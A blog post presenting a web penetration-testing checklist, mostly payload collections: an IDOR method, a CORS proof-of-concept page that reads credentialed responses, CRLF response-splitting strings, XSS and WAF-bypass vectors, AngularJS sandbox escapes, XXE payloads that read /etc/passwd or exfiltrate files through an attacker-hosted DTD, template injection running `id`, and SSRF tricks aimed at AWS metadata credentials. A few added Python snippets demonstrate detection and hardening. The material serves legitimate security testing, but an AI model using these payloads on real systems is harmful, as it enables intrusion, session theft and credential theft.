Ethan's Blog

Checklist notes

2019/09/03

Preface

Putting together a checklist for penetration testing; to be updated continuously.

IDOR (Insecure Direct Object Reference)

Impact ranking (P1 is the most severe):

  • P1 - account takeover; access to highly sensitive data (e.g. credit cards)
  • P2 - modify/delete other users' public data; access to private or public important data (e.g. tickets, invoices, payment information)
  • P3 - access/delete/modify private data (limited personal information: name, address, etc.)
  • P4 - access to any non-sensitive data

Categories

1. Horizontal privilege escalation

Scenario 1: ordinary user A can access ordinary user B's data

Scenario 2: by modifying the request URL or parameters, a user can access data they should have no right to see

2. Vertical privilege escalation

An ordinary user can perform administrator operations

Testing

Change A's ID to B's ID in the request and resend it to see whether the information can be obtained across accounts; when the ID pattern is known, enumerate IDs directly with Burp Intruder.

Fixed POST parameters, such as hidden inputs or values in AJAX data that are settled when the page is rendered, can all be modified by the client and must be tested too.

  • Capture a request made by user A and replay it with user B's credentials, then compare the returned data
  • Use an ordinary account to try to reach the admin interface or the CGI endpoints behind admin operations
  • Modify business IDs and similar values in the request URL, resend, and judge whether authorization was bypassed
  • Modify business IDs, usernames and similar values in the request parameters, resend, and judge whether authorization was bypassed

Detection with the Authz plugin

Prerequisite: two test accounts in the same business system.

Role of each account: account A performs the functionality; account B supplies the credential (Cookie or other identity-bearing request header).

Example:

Log in to the business system as both A and B, copy B's Cookie (or other identity-bearing request header) and paste it into Authz's New Header field; then exercise the application as A and let the plugin replay each captured request with B's header, comparing the two responses.

Reference: https://gh0st.cn/archives/2019-06-27/1
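The replay logic the Authz plugin automates, written out as an added example (not the plugin's code and not from the original post). Requests captured from user A are resent with user B's session cookie and flagged when B receives A's object. The HTTP layer is a constructed in-memory stand-in with a vulnerable handler and a fixed one, so the check runs offline; against a real target the `send` callable would be an HTTP client carrying B's Cookie header. All paths, cookies and invoice records are hypothetical.

```python
import re
from dataclasses import dataclass

# Constructed sample data: one session cookie per user, two invoice records.
SESSIONS = {"sess_A": "alice", "sess_B": "bob"}
INVOICES = {
    "1001": {"owner": "alice", "body": "invoice 1001: alice, card 4111-****-1111"},
    "1002": {"owner": "bob",   "body": "invoice 1002: bob, card 5500-****-0004"},
}
ROUTE = re.compile(r"/api/invoices/(\d+)")


@dataclass
class Request:
    path: str
    cookie: str


@dataclass
class Response:
    status: int
    body: str


def vulnerable_app(req):
    """Looks the invoice up by the ID in the URL and never checks who owns it."""
    if req.cookie not in SESSIONS:
        return Response(401, "login required")
    m = ROUTE.fullmatch(req.path)
    if not m or m.group(1) not in INVOICES:
        return Response(404, "not found")
    return Response(200, INVOICES[m.group(1)]["body"])


def fixed_app(req):
    """Same route, but the record must belong to the authenticated user."""
    user = SESSIONS.get(req.cookie)
    if user is None:
        return Response(401, "login required")
    m = ROUTE.fullmatch(req.path)
    inv = INVOICES.get(m.group(1)) if m else None
    # 404 rather than 403 for foreign records, so valid IDs cannot be enumerated.
    if inv is None or inv["owner"] != user:
        return Response(404, "not found")
    return Response(200, inv["body"])


def replay_as_other_user(send, captured_paths, cookie_a, cookie_b):
    """Resend every request captured from A with B's cookie.

    A path is reported when B receives the same 200 response as A: B was
    served A's object.  Real responses often differ in per-user details
    (CSRF tokens, the user's own name), so a production harness compares
    length or a similarity score and leaves the final verdict to a human.
    """
    findings = []
    for path in captured_paths:
        as_a = send(Request(path, cookie_a))
        as_b = send(Request(path, cookie_b))
        if as_a.status == 200 and as_b.status == 200 and as_b.body == as_a.body:
            findings.append(path)
    return findings


def run(app):
    # Request captured while browsing as alice: her own invoice.
    return replay_as_other_user(app, ["/api/invoices/1001"], "sess_A", "sess_B")


if __name__ == "__main__":
    print("vulnerable app:", run(vulnerable_app))  # ['/api/invoices/1001']
    print("fixed app:     ", run(fixed_app))       # []
```

The fixed handler answers 404 for records that exist but belong to someone else; a 403 would confirm that the ID is valid and make enumeration with Intruder more useful to the attacker.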

Cross Origin Resource Sharing (CORS)

Overview

CORS is a W3C standard, "Cross-origin resource sharing" in full. It lets a browser issue XMLHttpRequest requests to a server on a different origin (scheme + host + port), lifting the restriction that AJAX could only be used same-origin.

When it is misconfigured, i.e. the Origin is not strictly validated (reflected as-is, matched by prefix or suffix, or the null origin accepted), a page on an attacker's origin can read responses it should not.

Testing

curl --head -s 'http://example.com/api/v1/secret' -H 'Origin: http://evil.com'

Check what the server returns in Access-Control-Allow-Origin (if present) and, if present, whether Access-Control-Allow-Credentials: true is also set.

If it reflects an arbitrary origin and allow-credentials is true, use the following HTML as a proof of concept. Note that Access-Control-Allow-Origin: * together with credentials is not exploitable, because browsers refuse to expose a credentialed response under a wildcard.

<!DOCTYPE html>
<html>
<head><title>BugBounty CheatSheet</title></head>
<body>
<center>
<h2>CORs POC</h2>

<textarea rows="10" cols="60" id="pwnz">
</textarea><br>
<button type="button" onclick="cors()">Exploit</button>
</center>

<script>
function cors() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      // Show the cross-origin response body that was read with the victim's cookies
      document.getElementById("pwnz").value = this.responseText;
    }
  };
  xhttp.open("GET", "http://example.com/api/v1/topsecret", true);
  xhttp.withCredentials = true;  // send cookies; needs Access-Control-Allow-Credentials: true
  xhttp.send();
}
</script>
</body>
</html>

CRLF Injection || HTTP Response Splitting

Overview

CRLF stands for Carriage-Return Line-Feed: a carriage return (CR, ASCII 13, \r) followed by a line feed (LF, ASCII 10, \n), URL-encoded as %0d%0a. CRLF injection is also known as HTTP response splitting.

CRLF injection is similar in nature to XSS: the attacker sends malicious data to a vulnerable web application, and the application writes it into the HTTP response headers (whereas XSS is usually output in the body). Once the attacker controls a line break inside the headers they can add headers of their own (Set-Cookie, Location, ...) or, with a second CRLF, terminate the header block and supply their own body.

Detection therefore resembles XSS detection: inject CR/LF sequences through HTTP parameters or the URL and check whether the constructed data shows up in the response headers.

Testing

%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;

Header-based tests against the site root (the encoded variants target different decode-then-validate orderings on the server):

%0d%0aheader:header
%0aheader:header
%0dheader:header
%23%0dheader:header
%3f%0dheader:header
/%250aheader:header
/%25250aheader:header
/%%0a0aheader:header
/%3f%0dheader:header
/%23%0dheader:header
/%25%30aheader:header
/%25%30%61header:header
/%u000aheader:header

CRLF chained with Open Redirect server misconfiguration

Note: This sometimes works. (Discovered in some Yandex sites, was not exploitable from the root.)

//www.google.com/%2f%2e%2e%0d%0aheader:header
/www.google.com/%2e%2e%2f%0d%0aheader:header
/google.com/%2F..%0d%0aheader:header

Twitter specific CRLF by @filedescriptor (U+560A and U+560D: the server truncated each code point to its low byte, which yields 0x0A and 0x0D)

%E5%98%8A%E5%98%8Dheader:header

CRLF Injection to XSS

%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2e%2e

Response splitting on 302 Redirect, before Location header (Discovered in DoD)

%0d%0aContent-Type:%20text%2fhtml%0d%0aHTTP%2f1.1%20200%20OK%0d%0aContent-Type:%20text%2fhtml%0d%0a%0d%0a%3Cscript%3Ealert('XSS');%3C%2fscript%3E

Response splitting on 301 code, chained with Open Redirect to corrupt the Location header and break the 301, by @black2fan (Facebook bug)

Note: xxx:1 was used to break the open redirect destination (Location header). A great example of how to escalate CRLF to XSS on a 301 status code that would seem unexploitable.

%2Fxxx:1%2F%0aX-XSS-Protection:0%0aContent-Type:text/html%0aContent-Length:39%0a%0a%3cscript%3ealert(document.cookie)%3c/script%3e%2F..%2F..%2F..%2F../tr

Payloads

%0d%0a
%0d%0a%0d%0a
r%0d%0aContentLength:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContentType:%20text/html%0d%0aContentLength:%2019%0d%0a%0d%0a<html>Injected%02Content</html>
%0d%0d%0a%0a
0x0D0x0A
0x0D0x0D0x0A0x0A
\r\n
%5cr%5cn
%0%0d%0ad%0%0d%0aa
%0%0D%0AD%0%0D%0AA
%0d%0aContentType:%20text/html;charset=UTF-7%0d%0aContent-Length:%20129%0d%0a%0d%0a%2BADw-html%2BAD4-%2BADw-body%2BAD4-%2BADw-script%2BAD4-alert%28%27XSS,cookies:%27%2Bdocument.cookie%29%2BADw-/script%2BAD4-%2BADw-/body%2BAD4-%2BADw-/html%2BAD4
%0AContent-Type:html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
%0AContent-Type:html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3Ehttp://www.test.com
%0d%0a%0d%0a%3Chtml%3E%3Cbody%3E%3C%2Fbody%3E%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fs.js%3E%3C%2Fscript%3E%3Cscript%3Ealert(%22location.host%20is:%20%22%2Blocation.host)%3C%2Fscript%3E%3C%2Fhtml%3E
%0d%0a%0d%0a%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2Fscript%3E
%22%3E%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3C%22
%0AContent-type:%20text/html%0A%0Ahttp://www.test.com/%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
%0d%0a%0d%0a%3Cscript%3Ealert(%22XSS%22)%3C%2Fscript%3E
%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
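The header-based test from the section above, automated as an added example (not code from the page): each encoded CR/LF variant is sent to a handler and the raw response is inspected for the injected `header:header` line on a line of its own. The two handlers are constructed stand-ins for a redirect endpoint that decodes its parameter once and writes it into `Location` (vulnerable) and the same endpoint with the check a framework normally performs for you (hardened); nothing is sent over the network.

```python
from urllib.parse import unquote

MARKER = b"header:header"   # the injected header used by the payloads above

# Encoded variants from the list above.  Which ones fire depends on how many
# times, and where, the target decodes before writing the value into a header.
PAYLOADS = [
    "%0d%0aheader:header", "%0aheader:header", "%0dheader:header",
    "%23%0dheader:header", "%3f%0dheader:header",
    "/%250aheader:header", "/%25250aheader:header", "/%%0a0aheader:header",
    "/%u000aheader:header",
]


def vulnerable_redirect(raw_param):
    """Stand-in for a handler that decodes ?next= once and writes it into Location."""
    target = unquote(raw_param)
    return (f"HTTP/1.1 302 Found\r\nLocation: {target}\r\n"
            f"Content-Length: 0\r\n\r\n").encode("utf-8", "replace")


def hardened_redirect(raw_param):
    """Same handler, but any CR, LF or NUL in the decoded value is rejected
    outright; most frameworks do this for you, a raw socket/CGI handler does not."""
    target = unquote(raw_param)
    if any(c in target for c in "\r\n\0"):
        return b"HTTP/1.1 400 Bad Request\r\nContent-Length: 0\r\n\r\n"
    return (f"HTTP/1.1 302 Found\r\nLocation: {target}\r\n"
            f"Content-Length: 0\r\n\r\n").encode("utf-8", "replace")


def header_injected(raw_response, marker=MARKER):
    """True if `marker` starts a header line of its own in the response head.
    A bare CR is treated as a line break too, since some servers and
    intermediaries still honour it."""
    head = raw_response.split(b"\r\n\r\n", 1)[0]
    lines = head.replace(b"\r\n", b"\n").replace(b"\r", b"\n").split(b"\n")
    return any(line.lower().startswith(marker) for line in lines[1:])


def find_injections(handler, payloads=PAYLOADS):
    """Payloads for which the handler emitted the injected header."""
    return [p for p in payloads if header_injected(handler(p))]


if __name__ == "__main__":
    print("vulnerable:", find_injections(vulnerable_redirect))
    print("hardened:  ", find_injections(hardened_redirect))
```

Against the single-decode handler only the five plainly encoded variants fire; the `%25..` and `%%0a0a` forms are there for servers that decode twice or strip one `%0a` before decoding, and `%u000a` for legacy IIS-style unicode decoding, none of which this stand-in does.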

XSS

Chrome XSS-Auditor Bypass by @vivekchsm (the XSS Auditor was removed in Chrome 78, so the auditor bypasses below only matter for older Chrome builds)

<svg><animate xlink:href=#x attributeName=href values=&#106;avascript:alert(1) /><a id=x><rect width=100 height=100 /></a>

Chrome < v60 beta XSS-Auditor Bypass

<script src="data:,alert(1)%250A-->

Other Chrome XSS-Auditor Bypasses

<script>alert(1)</script
<script>alert(1)%0d%0a-->%09</script
<x>%00%00%00%00%00%00%00<script>alert(1)</script>

Safari XSS Vector by @mramydnei

<script>location.href;'javascript:alert%281%29'</script>

XSS Polyglot by Ahmed Elsobky

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

Kona WAF (Akamai) Bypass

\');confirm(1);//

ModSecurity WAF Bypass

Note: Whether this works depends on the rule set and paranoia level the application is configured with. See: https://modsecurity.org/rules.html

<img src=x onerror=prompt(document.domain) onerror=prompt(document.domain) onerror=prompt(document.domain)>

Wordfence XSS Bypasses

<meter onmouseover="alert(1)"
'">><div><meter onmouseover="alert(1)"</div>"
>><marquee loop=1 width=0 onfinish=alert(1)>

Incapsula WAF Bypasses by @i_bo0om

<iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';>
<img/src=q onerror='new Function`al\ert\`1\``'>

jQuery < 3.0.0 XSS by Egor Homakov

$.get('http://sakurity.com/jqueryxss')

(Before 3.0.0, $.get/$.ajax evaluated a response served as script, even cross-domain.) To actually exploit this jQuery XSS you need to fulfil one of the following:

1) Find any cross-domain request to an untrusted domain, which may inadvertently execute script.
2) Find any request to a trusted API endpoint where script can be injected into its data source.

URL verification bypasses (works without &#x09; too)

javas&#x09;cript://www.google.com/%0Aalert(1)

Markdown XSS

[a](javascript:confirm(1))
[a](javascript://www.google.com%0Aprompt(1))
[a](javascript://%0d%0aconfirm(1))
[a](javascript://%0d%0aconfirm(1);com)
[a](javascript:window.onerror=confirm;throw%201)
[a]: (javascript:prompt(1))
[a]:(javascript:alert(1))           //Add SOH Character
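What a link renderer has to do to survive the URL-verification and Markdown payloads above, as an added example (not code from the page or from any Markdown library). The rule mirrors the first steps of the browser's URL parser: HTML-decode the attribute value (so `&#x09;` becomes a tab), strip leading and trailing C0 controls and spaces (the SOH trick), delete tab/LF/CR anywhere (so `javas<TAB>cript:` is `javascript:`), then compare the scheme against an allow-list rather than a blacklist. `render_link` is a hypothetical renderer hook.

```python
import html
import re

ALLOWED_SCHEMES = {"http", "https", "mailto"}
_SCHEME = re.compile(r"^([a-z][a-z0-9+.\-]*):", re.IGNORECASE)
_C0_AND_SPACE = "".join(chr(i) for i in range(0x21))   # NUL..US and space
_TAB_NL = str.maketrans("", "", "\t\n\r")


def effective_scheme(href):
    """Return the scheme a browser will act on for this href, lower-cased, or
    None when the URL is relative.  Mirrors the WHATWG URL parser's first
    steps: the attribute value is HTML-decoded, leading/trailing C0 controls
    and spaces are stripped, and tab/LF/CR are removed anywhere."""
    s = html.unescape(href)            # &#x09; -> TAB, &#106; -> 'j'
    s = s.strip(_C0_AND_SPACE)         # the leading SOH (\x01) trick
    s = s.translate(_TAB_NL)           # javas<TAB>cript: -> javascript:
    m = _SCHEME.match(s)
    return m.group(1).lower() if m else None


def is_safe_href(href):
    """Allow relative links and an explicit allow-list of schemes; everything
    else (javascript:, data:, vbscript:, ...) is refused.  An allow-list is the
    only shape of this check that survives new obfuscations."""
    scheme = effective_scheme(href)
    return scheme is None or scheme in ALLOWED_SCHEMES


def render_link(text, href):
    """What a Markdown link renderer should emit for [text](href)."""
    if not is_safe_href(href):
        return f"<a>{html.escape(text)}</a>"
    return f'<a href="{html.escape(href, quote=True)}">{html.escape(text)}</a>'


if __name__ == "__main__":
    for p in ["javas&#x09;cript://www.google.com/%0Aalert(1)",
              "javascript://%0d%0aconfirm(1)",
              "\x01javascript:alert(1)",
              "https://example.com/", "/docs/index.html"]:
        print(f"{is_safe_href(p)!s:5} {p!r}")
```

Percent-encoding is deliberately not decoded before the scheme check: a browser does not turn `javas%09cript:` into `javascript:`, and the `%0A` in the payloads above only matters once the scheme has already been recognised as JavaScript (it ends the `//www.google.com` comment).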

Flash SWF XSS

  • ZeroClipboard: ZeroClipboard.swf?id=\"))}catch(e){confirm(/XSS./.source);}//&width=500&height=500&.swf
  • plUpload Player: plupload.flash.swf?%#target%g=alert&uid%g=XSS&
  • plUpload MoxiePlayer: Moxie.swf?target%g=confirm&uid%g=XSS (also works with Moxie.cdn.swf and other variants)
  • FlashMediaElement: flashmediaelement.swf?jsinitfunctio%gn=alert1
  • videoJS: video-js.swf?readyFunction=confirm and video-js.swf?readyFunction=alert%28document.domain%2b'%20XSS'%29
  • YUI “io.swf”: io.swf?yid=\"));}catch(e){alert(document.domain);}//
  • YUI “uploader.swf”: uploader.swf?allowedDomain=\%22}%29%29%29}catch%28e%29{alert%28document.domain%29;}//<
  • Open Flash Chart: open-flash-chart.swf?get-data=(function(){alert(1)})()
  • AutoDemo: control.swf?onend=javascript:alert(1)//
  • Adobe FLV Progressive: /main.swf?baseurl=asfunction:getURL,javascript:alert(1)// and /FLVPlayer_Progressive.swf?skinName=asfunction:getURL,javascript:alert(1)//
  • Banner.swf (generic): banner.swf?clickTAG=javascript:alert(document.domain);//
  • JWPlayer (legacy): player.swf?playerready=alert(document.domain) and /player.swf?tracecall=alert(document.domain)
  • SWFUpload 2.2.0.1: swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!confirm(1);//
  • Uploadify (legacy): uploadify.swf?movieName=%22])}catch(e){if(!window.x){window.x=1;confirm(%27XSS%27)}}//&.swf
  • FlowPlayer 3.2.7: flowplayer-3.2.7.swf?config={"clip":{"url":"http://edge.flowplayer.org/bauhaus.mp4","linkUrl":"JavaScriPt:confirm(document.domain)"}}&.swf

Note: Useful reference on constructing Flash-based XSS payloads available at MWR Labs.

Lightweight Markup Languages

RubyDoc (.rdoc)

XSS[JavaScript:alert(1)]

Textile (.textile)

"Test link":javascript:alert(1)

reStructuredText (.rst)

`Test link`__.

__ javascript:alert(document.domain)

Unicode characters

†‡•<img src=a onerror=javascript:alert('test')>…‰€

AngularJS Template Injection based XSS

For manual verification on a live target, read angular.version in the browser console and pick the sandbox escape for that release.

1.0.1 - 1.1.5 by Mario Heiderich (Cure53)

{{constructor.constructor('alert(1)')()}}

1.2.0 - 1.2.1 by Jan Horn (Google)

{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}

1.2.2 - 1.2.5 by Gareth Heyes (PortSwigger)

{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}

1.2.6 - 1.2.18 by Jan Horn (Google)

{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}

1.2.19 - 1.2.23 by Mathias Karlsson

{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}

1.2.24 - 1.2.29 by Gareth Heyes (PortSwigger)

{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}

1.3.0 by Gábor Molnár (Google)

{{!ready && (ready = true) && (
!call
? $$watchers[0].get(toString.constructor.prototype)
: (a = apply) &&
(apply = constructor) &&
(valueOf = call) &&
(''+''.toString(
'F = Function.prototype;' +
'F.apply = F.a;' +
'delete F.a;' +
'delete F.valueOf;' +
'alert(1);'
))
);}}

1.3.1 - 1.3.2 by Gareth Heyes (PortSwigger)

{{
{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
'a'.constructor.prototype.charAt=''.valueOf;
$eval('x=alert(1)//');
}}

1.3.3 - 1.3.18 by Gareth Heyes (PortSwigger)

{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
'a'.constructor.prototype.charAt=[].join;
$eval('x=alert(1)//'); }}

1.3.19 by Gareth Heyes (PortSwigger)

{{
'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;
$eval('x=alert(1)//');
}}

1.3.20 by Gareth Heyes (PortSwigger)

{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}

1.4.0 - 1.4.9 by Gareth Heyes (PortSwigger)

{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}

1.5.0 - 1.5.8 by Ian Hickey

{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}

1.5.9 - 1.5.11 by Jan Horn (Google)

{{
c=''.sub.call;b=''.sub.bind;a=''.sub.apply;
c.$apply=$apply;c.$eval=b;op=$root.$$phase;
$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;
C=c.$apply(c);$root.$$phase=op;$root.$digest=od;
B=C(b,c,b);$evalAsync("
astNode=pop();astNode.type='UnaryExpression';
astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';
astNode.argument={type:'Identifier',name:'foo'};
");
m1=B($$asyncQueue.pop().expression,null,$root);
m2=B(C,null,m1);[].push.apply=m2;a=''.sub;
$eval('a(b.c)');[].push.apply=a;
}}

1.6.0+ (no Expression Sandbox) by Mario Heiderich (Cure53)

{{constructor.constructor('alert(1)')()}}

Content Security Policy (CSP) bypass via JSONP endpoints

Grab the target's CSP:

curl -I http://example.com | grep 'Content-Security-Policy'

Either paste the CSP into https://csp-evaluator.withgoogle.com/ or just submit the target's address into the "Content Security Policy" field. The CSP Evaluator will flag any whitelisted domain that hosts known JSONP endpoints, since a callback parameter on an allowed origin lets you run arbitrary script under script-src.

Now we can use a Google dork to find some JSONP endpoints on the domains listed above.

site:example.com inurl:callback

XXE

LFI Test

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>

(The element declaration is written ANY; the often-copied (#ANY) is not valid DTD syntax and makes strict parsers reject the document before the entity is ever resolved.)

Blind LFI test (when the first case doesn't return anything)

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY % xxe SYSTEM "file:///etc/passwd">
<!ENTITY blind SYSTEM "https://www.example.com/?%xxe;">]><foo>&blind;</foo>

Caveat: referencing a parameter entity inside an entity value in the internal subset is a well-formedness error, so most parsers refuse this form; the reliable out-of-band variant puts the declarations in an external DTD, as in the FTP example further down.

Access Control bypass (loading restricted resources - PHP example)

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY ac SYSTEM "php://filter/read=convert.base64-encode/resource=http://example.com/viewlog.php">]>
<foo><result>&ac;</result></foo>

SSRF Test

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "https://www.example.com/text.txt">]><foo>&xxe;</foo>

XEE (XML Entity Expansion - DoS)

<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

XEE #2 (Remote attack - through external xml inclusion)

<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY test SYSTEM "https://example.com/entity1.xml">]>
<lolz><lol>3..2..1...&test;</lol></lolz>

XXE FTP HTTP Server

https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb

http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html

<!DOCTYPE data [
<!ENTITY % remote SYSTEM "http://publicServer.com/parameterEntity_sendftp.ddt">
%remote;
%send;
]>
<data>4</data>

File stored on http://publicServer.com/parameterEntity_sendftp.dtd

<!ENTITY % param1 "<!ENTITY &#37; send SYSTEM 'ftp://publicServer.com/%payload;'>">
%param1;

(%payload; must be declared as well, e.g. as a parameter entity pointing at the file to exfiltrate, before %param1; is expanded; the FTP transport is used because FTP tolerates the newlines in a multi-line file that HTTP URLs cannot carry. See the ONsec write-up above.)

XXE UTF-7

<?xml version="1.0" encoding="UTF-7"?>
+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4
+ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4

To convert between UTF-8 & UTF-7 use recode.
recode UTF8..UTF7 payload-file.xml
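The defensive counterpart to the payloads above, as an added example (not code from the page): every variant, file:// entities, the php:// filter, the remote parameter-entity DTD and the lol1..lol9 expansion chain, depends on a DOCTYPE, so the cheapest robust parser is one that refuses any document declaring a DTD before it resolves or expands anything. This uses only the standard library's expat binding; the sample documents are constructed from the payload shapes above, and `parameterEntity_sendftp.dtd` is the hypothetical host from the FTP example.

```python
import xml.parsers.expat
from xml.etree import ElementTree as ET


class ForbiddenDTD(ValueError):
    """Raised for any document that carries a DOCTYPE or entity declaration."""


def assert_no_dtd(xml_bytes):
    """Tokenise with expat and abort at the first DOCTYPE or ENTITY declaration.

    The handlers fire while the prolog is being read, before any entity is
    resolved or expanded, so neither file:///etc/passwd nor a remote .dtd is
    ever fetched and the lol1..lol9 chain is never expanded.
    """
    p = xml.parsers.expat.ParserCreate()

    def forbid(*_):
        raise ForbiddenDTD("DOCTYPE / ENTITY declarations are not accepted")

    p.StartDoctypeDeclHandler = forbid
    p.EntityDeclHandler = forbid
    # Belt and braces: even if a DOCTYPE slipped through, never load external
    # parameter entities (the %remote; / %send; trick above depends on them).
    p.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)
    p.Parse(xml_bytes, True)


def safe_parse(xml_bytes):
    """Parse untrusted XML into an Element, refusing anything with a DTD."""
    assert_no_dtd(xml_bytes)
    return ET.fromstring(xml_bytes)


def rejects(xml_bytes):
    """True if safe_parse refuses the document because of a DTD."""
    try:
        safe_parse(xml_bytes)
    except ForbiddenDTD:
        return True
    return False


# Constructed samples, built from the payload shapes above.
LFI_DOC = (b'<?xml version="1.0"?><!DOCTYPE foo [<!ELEMENT foo ANY>'
           b'<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>')
OOB_DOC = (b'<!DOCTYPE data [<!ENTITY % remote SYSTEM '
           b'"http://publicServer.com/parameterEntity_sendftp.dtd">%remote;%send;]>'
           b'<data>4</data>')
BENIGN_DOC = b'<?xml version="1.0"?><order><item sku="A1">2</item></order>'


def lol_bomb(depth=9):
    """Build the entity-expansion bomb (10**depth copies of 'lol')."""
    decls = ['<!ENTITY lol "lol">']
    for i in range(1, depth + 1):
        prev = "lol" if i == 1 else f"lol{i - 1}"
        refs = f"&{prev};" * 10
        decls.append(f'<!ENTITY lol{i} "{refs}">')
    return (f'<?xml version="1.0"?><!DOCTYPE lolz [{"".join(decls)}]>'
            f'<lolz>&lol{depth};</lolz>').encode()


if __name__ == "__main__":
    for name, doc in [("lfi", LFI_DOC), ("oob", OOB_DOC),
                      ("bomb", lol_bomb()), ("benign", BENIGN_DOC)]:
        print(f"{name:7s} rejected={rejects(doc)}")
```

This is the same policy that defusedxml implements; the point of writing it out is to see that the rejection happens in the prolog, so the UTF-7 trick above does not help either: expat has no UTF-7 decoder and fails on the declaration, which also counts as rejection for an untrusted document.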

Template Injection

Ruby (ERB)

<%=`id`%>

Twig

The following payload should output 49 (Twig coerces the string to a number).

{{7*'7'}}

Jinja

The same payload should output 7777777 (Python string repetition), which is how the two engines are told apart.

{{7*'7'}}

…..

SSRF

IP literal forms that defeat naive string checks: octal, hex and zero-padded octets (all 127.0.0.1 here, because inet_aton accepts them) and a bare decimal integer.

http://0177.1/
http://0x7f.1/
http://127.000.000.1
https://520968996

Note: The latter (the decimal form of an IPv4 address) can be calculated using http://www.subnetmask.info/

Exotic Handlers

gopher://, dict://, php://, jar://, tftp://

IPv6

http://[::1]
http://[::]

Wildcard DNS

10.0.0.1.xip.io
www.10.0.0.1.xip.io
mysite.10.0.0.1.xip.io
foo.bar.10.0.0.1.xip.io

Link: http://xip.io

10.0.0.1.nip.io
app.10.0.0.1.nip.io
customer1.app.10.0.0.1.nip.io
customer2.app.10.0.0.1.nip.io
otherapp.10.0.0.1.nip.io

Link: http://nip.io

AWS EC2 Metadata

http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/local-hostname
http://169.254.169.254/latest/meta-data/public-hostname

If there is an IAM role associated with the instance, role-name is the name of the role, and role-name contains the temporary security credentials associated with the role […] (the path is /latest/meta-data/iam/security-credentials/role-name). Instances that enforce IMDSv2 require a session token obtained with a PUT request first, so a GET-only SSRF will get a 401 there.

Link: http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html (includes a comprehensive Instance Metadata Categories table)
